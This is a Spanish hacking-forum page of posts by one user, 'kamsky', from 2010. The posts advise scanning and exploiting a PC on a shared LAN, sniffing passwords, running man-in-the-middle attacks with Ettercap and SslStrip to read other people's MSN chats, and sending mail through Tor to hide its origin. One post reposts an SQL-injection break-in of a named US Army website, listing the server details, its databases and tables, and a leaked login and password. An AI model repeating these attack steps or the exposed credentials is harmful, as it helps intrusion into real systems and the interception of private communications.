Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - kamsky

#261
DMZ= zona desmilitarizada, y no se que tiene que ver con lo que pretendes hacer... no te estarás confundiendo con NAT??¿¿

pero vamos, no se porque te complicas tanto, una vez que estás dentro de la misma LAN no tienes que andar tocando nada del router, simplemente escanea el Pc a ver que servicios tiene corriendo, averigua si alguno es vulnerable y explótalo
#262
bueno, seguro que es más simple que hacerte un programa tu... se me ocurre que si tienes firewall, se podrá programar para que no deje salir tráfico con destino al 80, y con eso simularás no tener acceso a internet.. si quieres hacerlo un pelín más sofisticado (tampoco mucho :p ), deja habilitado el tráfico saliente con destino puerto 80 pero deshabilita el 53 UDP, que es el que se usa para establecer conexión con los Servers DNS
#263
sniffa tráfico para intentar conseguir la pass que necesitas
#264
Hacking / Re: [HOW TO] Ataque modelo Wifi
17 Enero 2010, 20:48 PM
si, si tienen bien configurado un filtro anti arp poisoning es posible que salte el firewall, pero si no salta en este punto no debería de saltar con el SslStrip
#265
Hacking / Re: WLAN, Ettercap y MSN messenger
16 Enero 2010, 12:03 PM
buenas

a ver, las conversaciones van en texto plano, así que tienes que poder verlas... el problema puede residir en que estés intentando escuchar directamente el tráfico desde un Pc cableado a el Portatil que no lo está (o viceversa), para solucionar esto haz un MiM con ayuda del Ettercap y listo.

en cuanto al tráfico cifrado con SSL/TLS, es prácticamente imposible conseguir descifrarlo (al menos por tí, quizás tus tatatataranietos...), por lo que tienes que apañártelas con alguna triquiñuela como por ejemplo hacerle un MiM y usar SslStrip, para más info busca que hay muchos posts con esto.

p.d.: para que las conversaciones y demás del msn no viajen en texto plano hay plugins que te tunelizan las conversaciones o simplemente te enchufan SSL/TLS
#266
Hacking / Re: ERROR EN MEDUSA
15 Enero 2010, 12:45 PM
nunca he usado Medusa, prueba con Hydra para contrastar
#267
hombre, con PHP lo que harías sería crear un front-end del Servidor SMTP... el juego lo tienes que hacer en el propio Server SMTP (tuyo o alguno ajeno), un ejemplo es el que puse antes, tu te montas un Server SMTP en tu Pc, lo configuras normalmente, pero haces que salga a través de un Proxy como Tor, de manera que parecera que cada vez se está mandando el correo desde una Ip diferente
#269
Nivel Web / Demo de XSS+BeeF
14 Enero 2010, 16:20 PM
muy buen video explicando algunas de las posibilidades de esta maravillosa aplicación

http://www.youtube.com/watch?v=Q9pQ3NlJtFE
#270
                                /\                                    (_) |
                               /  \   _ __ _ __ ___  _   _   _ __ ___  _| |
                              / /\ \ | '__| '_ ` _ \| | | | | '_ ` _ \| | |
                             / ____ \| |  | | | | | | |_| |_| | | | | | | |
                            /_/    \_\_|  |_| |_| |_|\__, (_)_| |_| |_|_|_|
                                                      __/ |
                                                     |___/                 

The United States Army is the branch of the United States Military responsible for land-based military operations. It is the largest and oldest established branch of the U.S. military and is one of seven uniformed services. The modern Army has its roots in the Continental Army which was formed on 14 June 1775, before the establishment of the United States, to meet the demands of the American Revolutionary War. Congress created the United States Army on 14 June 1784 after the end of the war to replace the disbanded Continental Army. The Army considers itself to be descended from the Continental Army and thus dates its inception from the origins of that force.
Vulnerable link: http://onestop.army.mil
This website is vulnerable to MSSQL Injection. With this vulnerability i can see / extract all things from databases.
Testing:
and 1=1– (True)

and 1=2– (False)

Ok, in this picture we can see all main informations about webserver.

Main information:
Citar[b]#Version[/b]: Microsoft SQL Server 2000 - 8.00.2282 (Intel X86) Dec 30 2008 02:22:41 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
[b]#User[/b]: Dynatouch
[b]#Database[/b]: AHOS
[b]#Host Name[/b]: AHSGSVDAHQIT130

All databases:
Citar[0] AHOS
[1] master
[2] tempdb
[3] model
[4] msdb
[5] AHOS
[6] AHIT_WEB
[7] AHOS_HQD
[8] AHOS_WL
[9] HEAT
[10] REF_DB
[11] ReportDB
[12] USAREUR_TEST
[13] YARDI_CONV
[14] HOMES_IFS
[15] HOMES_CDB_USAREUR
[16] HOMES_WHSE
[17] HUACFSDIS102148
[18] PINEA4CASTLE
[19] HOMES_CDB
[20] GFOQ_Development
[21] ARTI02036THS003
[22] BISM5843235S301
[23] CDAR0413DPWS001
[24] CHAB000639BS002
[25] FRSA1050WHDS212
[26] GGDE0032284S005
[27] GRAF0244HOUS001
[28] HDCS3980WHDS204
[29] Spotlight
[30] LEDW0003SWFS002
[31] LEDW0252GSWS003
[32] NHQA4106WDAS101
[33] PANS2913GSTS001
[34] PION0011414S601
[35] SEMI0022DPWS002
[36] SULL0255WMAS001
[37] VCAM0107HOUS001
[38] WARN7114279S003
[39] WETZ8876222S210
[40] WIAF1023221S001
[41] LEDW0252GSWS001
[42] BUCHAHOMES01
[43] CASEA4KORHOU068
[44] GREE305APDPW001
[45] HNRYA4KOA4HG086
[46] HUMPA1KODPWH014
[47] RICH123A0PHO001
[48] SCHOU01A4DPWHMS
[49] TORIDPWA4177105
[50] WAIN224DB003153
[51] YONGA4KODPHD995
[52] ZAMADPWA0067011
[53] ANADA1HOMES
[54] APGRA0GAG-HOMES
[55] BENNA0I32214251
[56] BLISSVDPW1HS001
[57] BRAGA4PWAJ18145
[58] CARSDPWXAPS0002
[59] DAEN3104WKLS005
[60] DAMIAP06
[61] DIXXAPRDPW00001
[62] DRUMA001VA11202
[63] DUGWITA4HOMES
[64] EUSTDB13HOMES01
[65] FS-HOMES01
[66] FTBELVOIR_S001
[67] GAHSGHOMES
[68] GORDDBRCP001
[69] HAMIA1206DPW008
[70] HAWTA0HOMES
[71] HIALA0KOA4HG170
[72] HOODA0DPWSYS003
[73] IRWIIMA0HOMES3
[74] JACKDLEHOMES
[75] KNOXDBOSNT2
[76] KS-HSG-HOMES

We can access information_schema, so let's see the tables from principal database "AHOS"

Citar[0] comd_list
[1] dtproperties
[2] Faqs
[3] Faqs_Categories
[4] Forms
[5] forms_base
[6] gBase
[7] gBase_OLD
[8] gCountries
[9] gHousing_offices
[10] gHousing_offices-old
[11] gStates
[12] Housing_off_post
[13] Housing_phone_qr
[14] mgr_login
[15] mgr_login_OLD
[16] mgr_login_passwords
[17] mgr_login_save
[18] MgrCorner_Configuration
[19] MgrCorner_Configuration_ID
[20] must_know
[21] must_know_cat
[22] Must_know_OLD
[23] sysconstraints
[24] syssegments
[25] UPH
[26] UPH_OLD
[27] uph_photo_text
[28] uph_photo_tours
[29] uph_photos
[30] v_mapview
[31] V_RankView
[32] vHousingAreas
[33] vhqd_vrtours
[34] VIEW_housing
[35] VIEW_phototours
[36] VIEW_vrtours
[37] vMapFiles
[38] vMapOrder
[39] vPhotoFiles
[40] vPlan
[41] vPlanFiles
[42] vRank
[43] vRankDesc
[44] vRankRankDesc
[45] waitlist
[46] waitlist_items

Now, here are some interesting tables, like mgr_login_passwords.

Here i found user : password columns, with :
Citar#Username: Dynatouch
#Password: AHOS

wtf! :|
That it's all! Bye, TinKode...



dejo el enlace: http://tinkode.baywords.com/index.php/2010/01/army-mil-full-disclosure/